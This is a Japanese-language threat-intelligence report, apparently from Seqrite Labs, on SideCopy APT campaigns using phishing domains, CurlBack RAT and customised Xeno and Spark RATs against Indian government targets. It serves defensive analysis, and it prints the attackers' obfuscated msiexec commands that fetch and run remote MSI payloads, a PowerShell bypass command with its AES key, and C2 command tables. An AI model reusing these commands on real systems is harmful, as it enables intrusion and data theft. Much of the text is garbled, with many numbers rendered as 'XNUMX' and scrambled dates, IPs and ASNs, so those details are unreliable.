Seqrite Labs APTチームは、2024年XNUMX月最終週以降に展開されているパキスタン関連のSideCopy APTの新たな戦術を発見しました。このグループは標的範囲をインド政府、防衛、海事部門、大学生から拡大し、鉄道、石油・ガス、外務省傘下の組織も標的にしています。最近の攻撃キャンペーンにおける注目すべき変化の一つは、主要なステージング手段としてHTMLアプリケーション(HTA)ファイルからMicrosoftインストーラー(MSI)パッケージへの移行です。
脅威アクターは検出を回避するための戦術を絶えず進化させており、この変化はDLLサイドローディングとマルチプラットフォーム侵入の継続的な使用によって推進されています。この進化には、リフレクションローディングや、Xeno RATやSpark RATなどのオープンソースツールの再利用といった手法も組み込まれています。 傾向 Async RATと連携して機能を拡張しています。さらに、被害者をC2サーバーに登録するCurlBack RATと呼ばれる新しいペイロードも確認されています。
主な発見
- 攻撃者の電子メール ID に関連付けられたユーザー名は、侵害された ID を利用して、サイバー セキュリティの経歴を持つ政府職員になりすましています。
- オープンディレクトリを備えた電子政府サービスを模倣した偽のドメインは、ペイロードと認証情報フィッシングのログインページをホストするために使用されます。
- 13 個のサブドメインと URL は、すべてマハラシュトラ州の複数の市町村法人 (CMC) のさまざまな RTS サービスのログイン ページをホストしています。
- 水資源省管轄の国家水文学プロジェクト (NHP) の公式ドメインが侵害され、悪意のあるペイロードが配信されました。
- PowerShell によるリソース セクションのリフレクション ロードや AES 復号化などの新しい戦術を使用して、C# ベースのオープン ソース ツール XenoRAT のカスタム バージョンを展開します。
- LinuxプラットフォームをターゲットとするGolangベースのオープンソースツールSparkRATの修正版が、同じ方法で展開されました。 ステージャー 以前はPoseidonおよびAres RATペイロードに使用されていました。
- DLLサイドローディング技術を利用したCurlBackと呼ばれる新しいRATが使用されています。CurlBackは、UUIDを介して被害者をC2サーバーに登録し、curlを使用したファイル転送をサポートします。
- ハニートラップをテーマにしたキャンペーンは、パキスタンの担当者に機密データを漏洩したとして告発された政府職員の逮捕と同時期に、2025年2024月とXNUMX年XNUMX月に確認されました。
- 2024年2025月に確認された教育ポータルサイトが、XNUMX年XNUMX月に再び攻撃を受け、大学生を標的とした新しいURLが使用されました。これらのURLは「気候変動」「研究」「専門職」というXNUMXつの異なるテーマを採用しています(詳細な分析は録画でご覧いただけます)。 こちらSideCopy APT の 6 つの異なるクラスターについて説明します。
- SideCopyの親グループであるAPT36は、アフガニスタン・イスラム首長国の囚人管理局(OPA)に関連するテーマで長年活動を続けた後、アフガニスタンを標的にしました。「未来の戦争に向けたリーダーシップの育成」をテーマとしたLinuxシステムを標的とした最近の攻撃では、AES/RC4暗号化ステージャーを使用してMeshAgent RMMツールをドロップしています。
インド省の管轄下にある対象分野
- 鉄道
- 石油業界
- 外交
- 防衛
フィッシングメール
防衛部門を標的としたこのキャンペーンは、13年2025月65日付のフィッシングメールから始まりました。件名は「協議通り、NDC 65のスケジュールを更新」です。メールには、「NDCXNUMX-Updated-Schedule.pdf」というファイルをダウンロードするためのリンクが含まれており、標的を誘い込むためのものです。
15年2025月XNUMX日に送信されたXNUMX通目のフィッシングメール(件名「このコースのポリシー更新.txt」)にもフィッシングリンクが含まれています。このメールは、不正アクセスされた可能性のある、公式に見えるメールIDから送信されています。インド国防大学(NDC)は、デリーに所在する国家安全保障の戦略および実践を専門とする国防軍の訓練機関であり、インド国防省の管轄下にあります。
攻撃者のメールアドレス「gsosystems-ndc@outlook[.]com」は、10年2025月28日にUAEで作成され、最後に2025年XNUMX月XNUMX日にアクティブだったことが確認されています。OSINT(情報技術情報技術局)によると、類似のメールID「gsosystems.ndc-mod@nic[.]in」は、インドの電子情報技術省(MeitY)傘下の国立情報センター(NIC)に属していることが判明しています。攻撃者のメールにリンクされているユーザー名は、サイバーセキュリティの経歴を持つ政府職員を装っています。
おとり文書
このデコイはインドの国立防衛大学(NDC)に関するもので、第2025期課程(NDC-65)の65年度の年間訓練カレンダー(学習と活動)が掲載されています。ニューデリーに位置するNDCは、インド国防省管轄下の国防軍(インド軍)および公務員の将校のための戦略教育機関であり、最高レベルの教育機関です。
OpenDirとCredPhish
鉄道事業者を標的としたキャンペーンでは、e-Governanceポータルサービスを装った偽ドメインが利用されました。このドメインは16年2023月XNUMX日に作成され、捜査中に特定された複数のファイルをホストするオープンディレクトリを備えています。
合計 13 個のサブドメインが特定されており、次のようなさまざまなシステムのログイン ポータルとして機能します。
- ウェブメール
- 安全タンク管理システム
- 給与システム
- 権限を設定する
これらは認証情報のフィッシングに利用されている可能性が高く、昨年から複数の正規の政府ポータルを装って活発に活動しています。これらのログインページは通常、RTSサービス(公共サービス権利法)に関連しており、様々な市・地方自治体(CMC)に対応しています。これらの偽ポータルはすべて、マハラシュトラ州内の都市に属しています。
- チャンドラプール
- ガドチリ
- アコラ
- Sataraの
- ヴァサイ・ヴィラール
- バラプール
- ミラ・バインダー
次の表は、特定されたサブドメインとそれらが最初に観察された日付を示しています。
| サブドメイン | 最初に見た |
| gadchiroli.egovservice[.]in | 2024-12-16 |
| pen.egovservice[.]in | 2024-11-27 |
| cpcontacts.egovservice[.]in
cpanel.egovservice[.]in webdisk.egovservice[.]in cpcalendars.egovservice[.]in webmail.egovservice[.]in |
2024-01-03 |
| dss.egovservice[.]in
cmc.egovservice[.]in |
2023-11-03 |
| mail.egovservice[.]in | 2023-10-13 |
| pakola.egovservice[.]in
pakora.egovservice[.]in |
2023-07-23 |
| egovservice[.]in | 2023-06-16 |
これらのドメインはすべて、主にAS 140641(YOTTA NETWORK SERVICES PRIVATE LIMITED)で登録された以下のDNS履歴を持っています。これは、正規のサービスを偽装し、無防備なユーザーから認証情報を収集するために組織的に構築されたインフラストラクチャの可能性を示唆しています。
オープンディレクトリをさらに調査したところ、偽ドメインに関連する追加のURLが見つかりました。これらのURLは、同様のフィッシング目的で使用され、さらにおとりコンテンツをホストしている可能性があります。
| hxxps://egovservice.in/vvcmcrts/ |
| hxxps://egovservice.in/vvcmc_safety_tank/ |
| hxxps://egovservice.in/testformonline/test_form |
| hxxps://egovservice.in/payroll_vvcmc/ |
| hxxps://egovservice.in/pakora/egovservice.in/ |
| hxxps://egovservice.in/dssrts/ |
| hxxps://egovservice.in/cmc/ |
| hxxps://egovservice.in/vvcmcrtsballarpur72/ |
| hxxps://egovservice.in/dss/ |
| hxxps://egovservice.in/130521/set_authority/ |
| hxxps://egovservice.in/130521/13/ |
クラスターA
SideCopyの最初の攻撃群は、WindowsとLinux環境の両方を同時に標的とする高度なアプローチを示しています。新たなリモートアクセス型トロイの木馬(RAT)が攻撃手段に加わり、多様なシステムを効果的に侵害する能力が強化されています。
Windows
スピアフィッシングメールのリンクは、二重拡張子(.pdf.lnk)のショートカットを含むアーカイブファイルをダウンロードします。これらのファイルは、一見正当なドメインでホストされています。
| hxxps://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/ |
| hxxps://nhp.mowr.gov.in/NHPMIS/TrainingMaterial/aspx/セキュリティガイドライン/ |
ショートカットトリガー cmd.exeを エスケープ文字 (^) を用いた引数により検出を回避し、可読性を低下させています。これらのファイルには、通常「desktop-」プレフィックスが付くのに対し、新しいマシンID「dv-kevin」が使用されています。
ユーティリティmsiexec.exeは、リモートでホストされているMSIパッケージのインストールに使用されます。インストールスイッチにQuietモードフラグを使用します。
| C:\Windows\System32\cmd.exe /cm^s^i^e^x^e^c.exe /q /ih^t^t^p^s^:^/^/^e^g^o^v^s^e^r^v^i^c^e^.^i^n^/^d^s^s^r^t^s^/^h^e^l^p^e^r^s^/^f^o^n^t^s^/^2^0^2^4^-^N^a^t^i^o^nal-^H^o^l^i^d^a^y^s^-^R^H^-^P^E^R^_^N-^1^/^i^n^s^t^/ |
| C:\Windows\System32\cmd.exe /cm^s^i^e^x^e^c.exe /q /ih^t^t^p^s^:^/^/^n^h^p^.^m^o^w^r^.^g^o^v^.^i^n^/^N^H^P^M^I^S^/^T^r^a^i^n^i^n^g^M^a^t^e^r^i^a^l^/^a^s^p^x^/^S^e^c^u^r^i^t^y^-^G^u^i^d^e^l^i^n^e^s^/^w^o^n^t^/ |
最初のドメインは、オープンディレクトリで確認された偽の電子政府サイトを模倣したもので、2つ目のドメインは、水資源省傘下の公式組織である国家水文学プロジェクトに属する侵害されたドメインです。MSIには.NET実行ファイルが含まれています。 ConsoleApp1.exe これはbase64でエンコードされた複数のPEファイルをドロップします。まず、おとり文書は 公共 ディレクトリにドロップされ、開かれ、残りのPEファイルは「C:\ProgramData\LavaSoft\'. その中には2つのDLLがあります:
- 正規のDLL: サンプルオース.dll
- 悪意のあるDLL: DUI70.dll、として識別 CurlBack RAT.
CurlBack RAT
署名されたWindowsバイナリ girbesre.exe 元の名前で カメラ設定UIHost.exe DLLの横にドロップされます。実行されると、EXEは悪意のあるDLLをサイドロードします。永続化はHTAスクリプト(svnides.hta)は、EXEファイルのRunレジストリキーを作成します。2024つの異なる悪意のあるDLLサンプルが見つかりました。コンパイルタイムスタンプは12年24月2024日と12年30月XNUMX日です。
CurlBack RATはまず、特定のURLへのレスポンスを「/antivmcommand」コマンドで確認します。レスポンスが「on」の場合は処理を続行し、そうでない場合はチェック状態を維持したまま自身を終了します。以下のレジストリキーを使用して、システム情報と接続されたUSBデバイスの情報を収集します。
- 「SYSTEM\\ControlSet001\\Enum\\USBSTOR」
エクスプローラー、msedge、Chrome、メモ帳、Taskmgr、サービス、Defender、設定を確認するために、接続され実行中のプロセスが列挙されて表示されます。
次に、C2サーバーへのクライアント登録用のUUIDを生成します。生成されたIDは「C:\ユーザー\ \.client_id.txt” ユーザー名と一緒に。
IDに登録する前に、「OneDrive” は正規のバイナリであり、次の場所で確認できます: “C:\Windows\System32\Tasks\OneDrive"。
C2 ドメインに追加された逆順に並べられた文字列とその目的:
| String | Functionality |
| /レツィガー/ | クライアントをC2に登録する |
| /sdnammoc/ | C2からコマンドを取得する |
| /タエブトラエ/ | C2との接続を定期的に確認する |
| /stluser/ | 結果をC2にアップロードする |
登録されると、接続は維持され、応答で返されるコマンドが取得されます。
応答に何らかの値が含まれている場合、現在のタイムスタンプを取得し、次のいずれかの C2 コマンドを実行します。
| Command | Functionality |
| info | システム情報を収集する |
| ダウンロード | ホストからファイルをダウンロードする |
| 持続性 | 永続設定の変更 |
| ラン | 任意のコマンドを実行する |
| エキス | システムからデータを抽出する |
| 許可 | 権限の確認と昇格 |
| users | ユーザーアカウントを列挙する |
| CMD | コマンドライン操作を実行する |
その他の基本的な機能には、ユーザーとホストの詳細情報の取得、アーカイブファイルの抽出、タスクの作成などがあります。文字列とコードから、悪意のあるDLL内にCURLが存在し、様々なファイル形式の列挙と転送を行っていることがわかります。
- 画像ファイル: GIF、JPEG、JPG、SVG
- テキストファイル: TXT、HTML、PDF、XML
Linux
SideCopyの最初のクラスターは、Windowsを標的とした攻撃に加え、Linux環境も標的としています。悪意のあるアーカイブファイルはWindows版と同じ名前ですが、更新日は2024年12月20日です。このアーカイブにはGoベースのELFバイナリが含まれており、一貫したクロスプラットフォーム戦略を反映しています。解析の結果、ステージャーの関数フローは、 ステージャー PoseidonおよびAres RATに関連しています。これらはそれぞれTransparent TribeおよびSideCopy APTにリンクされています。
ステージャー機能:
- あなたが使用します wgetの デコイをダウンロードするコマンド 自治政府サービス ドメインをターゲットディレクトリに /.local/share それを開きます (National-Holidays-RH-PER_N-1.pdf)。
- 最終ペイロードをダウンロードする エルフ as /.local/share/xdg-open そして実行します。
- 現在のユーザー名で、システムの再起動後もペイロードの永続性を維持するために、crontab '/dev/shm/mycron' を作成します。
ステージャーによって配信される最終的なペイロードは、Windows、macOS、Linuxシステムに対応するクロスプラットフォーム対応のオープンソースリモートアクセス型トロイの木馬、Spark RATです。Go言語で記述され、2022年にGitHubでリリースされたこのRATは、500以上のフォークを持つ非常に人気の高いRATです。Spark RATは、C2サーバーとの通信にWebSocketプロトコルとHTTPリクエストを使用します。
Spark RATの機能には、プロセスの管理と終了、ネットワークトラフィックの監視、ファイルの探索と転送、ファイルの編集と削除、コードのハイライト表示、デスクトップの監視、スクリーンショットのキャプチャ、OS情報の取得、リモート端末へのアクセスなどがあります。さらに、シャットダウン、再起動、ログオフ、スリープ、休止状態、画面ロックなどの電源管理機能もサポートしています。
クラスターB
SideCopy の活動の 2023 番目のクラスターは Windows システムをターゲットにしていますが、XNUMX 年以降に観察されたインフラストラクチャに基づいて、Linux システムをターゲットにしているのではないかと疑っています。
感染は、スピアフィッシングメールのリンクから始まり、「NDC65-Updated-Schedule.zip」というアーカイブファイルをダウンロードします。このファイルには、二重拡張子のショートカットファイルが含まれており、このショートカットファイルは、別の侵害ドメインでホストされているリモートHTAファイルを起動します。
- 「hxxps://modspaceinterior.com/wp-content/upgrade/01/ & mshta.exe」
LNKファイル「desktop-ey8nc5b」に関連付けられたマシンIDは、SideCopyの過去のキャンペーンでも確認されていますが、更新日時が「2023:05:26」であることから、古いIDが再利用されている可能性があります。MSIステージャーと並行して、このグループはHTAベースのステージャーも利用し続けており、これはほぼ完全に検出されない状態(FUD)となっています。
HTAファイルにはBase64でエンコードされた.NETペイロードが含まれています BroaderAspect.dllはデコードされ、MSHTAのメモリに直接ロードされます。このバイナリは、ドロップされたNDCデコイ文書を ProgramData ディレクトリと追加の.NETステージャーをPDFとして 公共 ディレクトリ。永続性は「Edgre」という名前のレジストリキーの実行によって設定され、次のように実行されます。
cmd /C start C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf
暗号化されたペイロード
ドロップされた「Myapp.pdb」という名前の .NET バイナリには、次の 2 つのリソース ファイルがあります。
- 「Myapp.Resources.Document.pdf」
- 「Myapp.Properties.Resources.resources」
最初のものは次のようにデコードされます シーザー暗号 9文字分後方にシフトします。これは「パブリック\ダウンロード\ドキュメント.pdf' (122.98 KB) は、2004 年の GIAC 論文「Windows オペレーティング システム上のリモート アクセス型トロイの木馬の高度な通信技術」です。
これはおとりではありませんが、最後に暗号化されたペイロードが付加されています。マルウェアは「%%EOFPDFデータとEXEデータを区別するために「.pdf」マーカーを使用します。PDFデータは先頭からマーカーまで抽出され、EXEデータはマーカーから6バイトをスキップして抽出されます。
しばらくすると、EXEデータは「パブリック\ダウンロード\suport.exe」(49.53 KB)は、PowerShell コマンドをトリガーするためのキーとともに引数として送信されます。
PowerShell ステージ
ポリシーとプロファイルを無視するための基本引数「-NoProfile -ExecutionPolicy Bypass -Command」を指定したPowerShellコマンドの実行が確認されています。送信されるパラメータは以下の2つです。
-EPath 'C:\\Users\\Public\\Downloads\\suport.exe'-EKey 'wq6AHvkMcSKA++1CPE3yVwg2CpdQhEzGbdarOwOrXe0='
しばらく遅延した後、暗号化キーがBase64からデコードされ、最初の16バイトがAES暗号化(PKCS7パディング付きCBCモード)のIVとして扱われます。これは、復号されたバイナリを.NETアセンブリとして直接メモリに読み込み、エントリポイントを呼び出すためです。
カスタム Xeno RAT
最終的な.NETペイロード「DevApp.exe」をダンプすると、Xeno RATに見られるおなじみの機能にたどり着きます。これはオープンソースのリモートアクセス型トロイの木馬で、2023年末に初めて確認されました。主な機能には、HVNC、ライブマイクアクセス、SOCKS5リバースプロキシ、UACバイパス、キーロガーなどがあります。SideCopyが使用するカスタム亜種には、C2とポート79.141.161[.]58:1256を使用した基本的な文字列操作メソッドが追加されています。
昨年、北朝鮮関連のAPT(UAT-5394)によって、MoonPeakと呼ばれるカスタムXeno RATの亜種が使用されました。同様に、DragonSparkやTAG-100といった中国語圏のアクターによって、カスタムSpark RATの亜種が採用されています。
インフラストラクチャとアトリビューション
脅威グループがマルウェアのステージングに使用したドメイン。そのほとんどはGoDaddy.com, LLCがレジストラとなっています。
| ステージングドメイン | 最初に見た | 作成 | ASN |
| modspaceinterior[.]com | 月2025 | 9月2024 | AS 46606 – GoDaddy |
| drjagrutichavan[.]com | 月2025 | 10月2021 | AS 394695 – GoDaddy |
| nhp.mowr[.]gov[.]in | 12月2024 | 2月2005 | AS 4758 – 国立情報学センター |
| egovservice[.]in | 12月2024 | 2023年6月 | AS 140641 – GoDaddy |
| pmshriggssssiwan[.]in | 月2024 | マル2024 | AS 47583 – ホスティング |
| 教育ポータル[.]in | 8月2024 | 8月2024 | AS 22612 – NameCheap |
C2ドメインは、キャンペーンの直前、2024年13335月の最終週に作成されました。カナダのレジストラ「Internet Domain Service BS Corp.」では、カリフォルニアにあるCloudflare ASN XNUMXのIPに解決されます。
| C2ドメイン | 作成 | IP | ASN |
| アップデートウィジェットサービスセンター[.]com | 2024-Dec-25 | 104.21.15[。]163
172.67.163[。]31
|
ASN 13335 – クロフレア |
| アップデート.biossysinternal[.]com | 2024-Dec-23 | 172.67.167[。]230
104.21.13[。]17 |
ASN 202015 – HZ Hosting Ltd. |
Xeno RAT 2[.]79.141.161 の C58 には、ASN 63 の HZ Hosting Limited との一意の共通名 (CN=PACKERP-8KUN202015U) があります。通信に使用されるポートは 1256 ですが、開いている RDP ポート 56777 も確認されています。
両方のC2ドメインはCloudflare ASN 13335に関連付けられており、IPアドレス範囲172.67.xx.xxに解決されます。このASNの同様のC2ドメインは、SideCopyによって以前、Cloudflareを標的とした攻撃で利用されていました。 海上の 過去の感染クラスター、観察されたTTP、ホストされたオープンディレクトリを考慮すると、新しいTTPを伴うこれらのキャンペーンは、SideCopyに起因すると高い確度で判断されます。
結論
パキスタンに関連するAPTグループ「SideCopy」は、2024年XNUMX月下旬以降、戦術を大幅に進化させ、鉄道、石油・ガス、外務省などの重要セクターを標的に拡大しています。グループは、主要なステージング手段としてHTAファイルからMSIパッケージに移行し、DLLサイドローディング、リフレクションローディング、PowerShellによるAES復号といった高度な手法を継続的に採用しています。さらに、Xeno RATやSpark RATなどのカスタマイズされたオープンソースツールを活用し、新たに特定されたCurlBack RATも導入しています。侵害されたドメインや偽サイトは、認証情報のフィッシングやペイロードのホスティングに利用されており、グループが持続性を高め、検出を回避しようと継続的に取り組んでいることが浮き彫りになっています。
SEQRITE保護
- LNK.サイドコピー.49245.Gen
- LNK.トロイの木馬.49363.GC
- サイドコピー.Mal.49246.GC
- HTA.サイドコピー.49248.Gen
- HTA.サイドコピー.49247.Gen
- HTA.トロイの木馬.49362.GC
- トロイの木馬.Fmq
IOC
Windows
| a5410b76d0cb36786e00d2968d3ab6e4 | 2024-国民の祝日-RH-PER_N-1.zip |
| f404496abccfa93eed5dfda9d8a53dc6 | 2024-国民の祝日-RH-PER_N-1.pdf.lnk |
| 0e57890a3ba16b1ac0117a624f262e61 | セキュリティガイドライン.zip |
| 57c2f8b4bbf4037439317a44c2263346 | セキュリティガイドライン.pdf.lnk |
| 53eebedc3846b7cf5e29a90a5b96c803 | wininstaller.msi |
| 97c3328427b72f05f120e9a98b6f9b09 | インストーラーr.msi |
| 0690116134586d41a23baed300fc6355 | ConsoleApp1.exe |
| ef40f484e095f0f6f207139cb870a16e | ConsoleApp1.exe |
| 9d189e06d3c4cefdd226e645a0b8bdb9 | DUI70.dll |
| 589a65e0f3fe6777d17d0ac36ab07f6f | DUI70.dll |
| 0eb9e8bec7cc70d603d2d8b6efdd6bb5 | 議論された通り、ndc 65 の更新スケジュール.txt |
| 8ceeeec0e33026114f028cbb006cb7fc | このコースのポリシー更新.txt |
| 1d65fa0457a9917809660fff782689fe | NDC65-更新スケジュール.zip |
| 7637cbfa99110fe8e1074e7ead66710e | NDC65-更新スケジュール.pdf.lnk |
| 32a44a8f7b722b078b647e82cb9e85cf | NDC65 更新スケジュール.hta |
| a2dc9654b99f656b4ab30cf5d97fe2e1 | BroaderAspect.dll |
| b45aa156aef2ad2c77b7c623a222f453 | zuidrt.pdf |
| 83ce6ee6ad09a466eb96f347a8b0dc20 | 文書.pdf |
| cf6681cf1f765edb6cae81eeed389f78 | サポート.exe |
| c952aca2036d6646c0cffde9e6f22775 | DevApp.exe (カスタム Xeno RAT) |
Linux
| b5e71ff3932c5ef6319b7ca70f7ba8da | 2024-国民の祝日-RH-PER_N-1.zip |
| 0a67bfda993152c93a212087677f9b60 | 2024年-国民の祝日-RH-PER_N-1․pdf |
| e165114280204c39e99cf0c650477bf8 | clinsixfer.elf (カスタム Spark RAT) |
C2
| 79.141.161 [。] 58:1256 | ゼノラット |
| アップデートウィジェットサービスセンター[.]com
アップデート.biossysinternal[.]com |
CurlBack RAT |
URLは
| hxxps://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/ |
| hxxps://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/inst/ |
| hxxp://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/lns/clinsixfer.elf |
| hxxp://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/lns/2024-National-Holidays-RH-PER_N-1.pdf |
| hxxps://nhp.mowr.gov.in/NHPMIS/TrainingMaterial/aspx/セキュリティガイドライン/ |
| hxxps://nhp.mowr.gov.in/NHPMIS/TrainingMaterial/aspx/セキュリティガイドライン/wont/ |
| hxxps://updates.widgetservicecenter.com/antivmcommand |
| hxxps://modspaceinterior.com/wp-content/upgrade/02/NDC65-Updated-Schedule.zip |
| hxxps://modspaceinterior.com/wp-content/upgrade/01/ |
| hxxps://modspaceinterior.com/wp-content/upgrade/01/NDC65-Updated-Schedule.hta |
| hxxps://egovservice.in/vvcmcrts/ |
| hxxps://egovservice.in/vvcmc_safety_tank/ |
| hxxps://egovservice.in/testformonline/test_form |
| hxxps://egovservice.in/payroll_vvcmc/ |
| hxxps://egovservice.in/pakora/egovservice.in/ |
| hxxps://egovservice.in/dssrts/ |
| hxxps://egovservice.in/cmc/ |
| hxxps://egovservice.in/vvcmcrtsballarpur72/ |
| hxxps://egovservice.in/dss/ |
| hxxps://egovservice.in/130521/set_authority/ |
| hxxps://egovservice.in/130521/13/ |
ステージングドメイン
| modspaceinterior[.]com |
| drjagrutichavan[.]com |
| nhp.mowr[.]gov[.]in |
| pmshriggssssiwan[.]in |
| 教育ポータル[.]in |
| egovservice[.]in |
| gadchiroli.egovservice[.]in
pen.egovservice[.]in cpcontacts.egovservice[.]in cpanel.egovservice[.]in webdisk.egovservice[.]in cpcalendars.egovservice[.]in webmail.egovservice[.]in www.dss.egovservice[.]in www.cmc.egovservice[.]in cmc.egovservice[.]in dss.egovservice[.]in mail.egovservice[.]in www.egovservice[.]in www.pakola.egovservice[.]in pakola.egovservice[.]in www.pakora.egovservice[.]in pakora.egovservice[.]in |
ホストとPDB
| C:\ProgramData\LavaSoft\Sampeose.dll |
| C:\ProgramData\LavaSoft\DUI70.dll |
| C:\ProgramData\LavaSoft\girbesre.exe |
| C:\ProgramData\LavaSoft\svnides.hta |
| C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf |
| C:\Users\Public\Downloads\Document.pdf |
| C:\Users\Public\Downloads\suport.exe |
| E:\finalRnd\Myapp\obj\Debug\Myapp.pdb |
おとり
| 320bc4426f4f152d009b6379b5257c78 | 2024年国民の祝日-RH-PER_N-1.pdf |
| 9de50f9357187b623b06fc051e3cac4f | セキュリティガイドライン.pdf |
| c9c98cf1624ec4717916414922f196be | NDC65更新スケジュール.pdf |
| 83ce6ee6ad09a466eb96f347a8b0dc20 | 文書.pdf |
MITER ATT&CK
| TTP | 名 |
| 偵察 | |
| T1589.002 | 被害者の身元情報を収集する: 電子メールアドレス |
| リソース開発 | |
| T1583.001
T1584.001 T1587.001 T1588.001 T1588.002 T1608.001 T1608.005 T1585.002 T1586.002 |
インフラストラクチャの取得:ドメイン
侵害インフラストラクチャ: ドメイン 機能の開発:マルウェア 機能の取得:マルウェア 機能の取得:ツール ステージ機能:マルウェアのアップロード ステージ機能: リンクターゲット アカウントの確立: 電子メールアカウント 侵害アカウント: 電子メール アカウント |
| 初期アクセス | |
| T1566.002 | フィッシング:スピアフィッシング リンク |
| 実行 | |
| T1106
T1129 T1059 T1047 T1204.001 T1204.002 |
ネイティブAPI
共有モジュール コマンドおよびスクリプト インタプリタ Windowsの管理の実装 ユーザーの実行: 悪意のあるリンク ユーザーの実行:悪意のあるファイル |
| 固執 | |
| T1053.003
T1547.001 |
スケジュールされたタスク/ジョブ: Cron
レジストリ実行キー / スタートアップ フォルダー |
| 権限昇格 | |
| T1548.002 | 昇格制御メカニズムの悪用: ユーザー アカウント制御のバイパス |
| 防衛回避 | |
| T1036.005
T1036.007 T1140 T1218.005 T1574.002 T1027 T1620 |
マスカレード:正当な名前または場所と一致する
マスカレード: 二重のファイル拡張子 ファイルまたは情報の難読化/デコード システムバイナリプロキシ実行: Mshta ハイジャック実行フロー:DLLサイドローディング 難読化されたファイルまたは情報 リフレクションコードの読み込み |
| プーケットの魅力 | |
| T1012
T1016 T1033 T1057 T1082 T1083 T1518.001 |
クエリレジストリ
システムネットワーク構成の検出 システム所有者/ユーザーの発見 プロセスディスカバリー システム情報の発見 ファイルとディレクトリの検出 ソフトウェアの発見: セキュリティ ソフトウェアの発見 |
| 収集 | |
| T1005
T1056.001 T1123 T1113 T1560.001 |
ローカルシステムからのデータ
入力キャプチャ:キーロガー オーディオキャプチャ スクリーンキャプチャ 収集されたデータのアーカイブ: ユーティリティによるアーカイブ |
| コマンドおよび制御 | |
| T1105
T1571 |
入力ツール転送
非標準ポート |
| exfiltration | |
| T1041 | C2チャネルを介した浸透 |
著者:
サトウィック・ラム・プラッキ
カルティックマル・ジヴァニ
